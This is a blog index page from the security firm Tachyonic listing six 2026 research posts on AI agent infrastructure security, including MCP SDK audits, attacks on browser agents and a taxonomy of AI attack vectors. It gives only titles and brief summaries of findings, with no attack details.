TachyonicTachyonic
Blog/research

We Tested 14 AI Agent Infrastructure Targets. Here's What Actually Breaks.

200+ confirmed vulnerabilities across 14 AI agent infrastructure targets. The patterns are consistent: unsanitized tool inputs, missing auth on internal APIs, credentials in plaintext, and sandbox isolation that doesn't isolate. Recent incidents just proved these aren't theoretical.

research · Apr 22, 2026

OWASP Tells You What's Wrong. We Built the Framework for How to Fix It.

We open-sourced the Evolutionary Security Framework — a ten-phase maturity model for progressively hardening agentic AI systems, from naming threats to mathematically proving defenses.

research · Apr 7, 2026

We Ran 396 Attacks Against a Browser Agent — Your Triage Pipeline Isn't Ready

Browser agents break every auto-triage heuristic built for chatbots and MCP tools. 193 findings. 191 false positives. 2 real vulnerabilities the scanner missed. Here's what we learned.

research · Mar 31, 2026

We Tested Two MCP Implementations Against Three Attack Classes — Here's What Broke

Independent security assessment of two production MCP implementations reveals 11 vulnerabilities and 7 specification gaps. All traced to normative omissions in the MCP protocol.

research · Mar 3, 2026

We Audited Both MCP SDKs — Here Are the Three Vulnerability Classes We Found

Source-code audit of both MCP SDKs reveals three boundary-crossing vulnerability classes. All confirmed with live PoC exploits and validated against production LLMs.

research · Feb 24, 2026

We Catalogued 122 Ways to Break AI Systems — Here's the Taxonomy

We built a comprehensive taxonomy of 122 AI-specific attack vectors, mapped to OWASP LLM Top 10 and MITRE ATLAS. Today we're open-sourcing it.

research · Feb 3, 2026